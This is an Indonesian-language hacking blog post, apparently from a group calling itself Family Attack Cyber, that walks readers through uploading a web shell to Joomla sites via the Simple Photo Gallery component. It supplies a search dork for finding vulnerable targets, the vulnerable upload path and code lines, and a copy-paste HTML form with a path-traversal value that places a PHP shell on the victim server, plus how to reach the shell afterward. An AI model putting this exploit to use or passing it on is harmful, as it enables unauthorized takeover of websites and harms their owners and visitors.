Joomla Simple Photo Gallery Shell Upload
Go Gees o,O Tutorial nya o.O , gw harap lu langsung Paham o.O Gk Paham ?Visit Grub kami ^_^ -> Family Attack Cyber
Dork -> inurl:com_simplephotogallery
Exploit -> /administrator/components/com_simplephotogallery/lib/uploadFile.php
Dorking dulu lah o.0 Pilih web Masukkan Exploit -> Jadi Target.com/administrator/components/com_simplephotogallery/lib/uploadFile.php
Kalo Web Vuln akan bacaan seperti ini :
20. $fieldName = 'uploadfile';
87. $fileTemp = $_FILES[$fieldName]['tmp_name'];
94. $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96. if(! move_uploaded_file($fileTemp, $uploadPath))
Not Found ? Atau 404 ? Tinggalin deh -_-
Silahkan Copy Code ini :
<form method="POST" action="http://familyattackcyber.blogspot.com/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
<input type="file" name="uploadfile"><br>
<input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
<input type="submit" name="Submit" value="Enjoy Aje">
</form>
Paste abis itu save dengan .html ,jika sudah edit file tersebut lihat http://familyattackcyber.blogspot.com ganti dengan target kalian.
Jika sudah buka , abis itu pilih shell lu dan klik Enjoy Aje
Name Shell jadi Random contoh -> FAC__D31saxA.php
Shell Access -> http://target.com/FAC__(RandomString).php
Done ? Jangan lupa join grub nya cok !!! jika Gk paham mah :v
Family Attack Cyber
Post A Comment:
0 comments: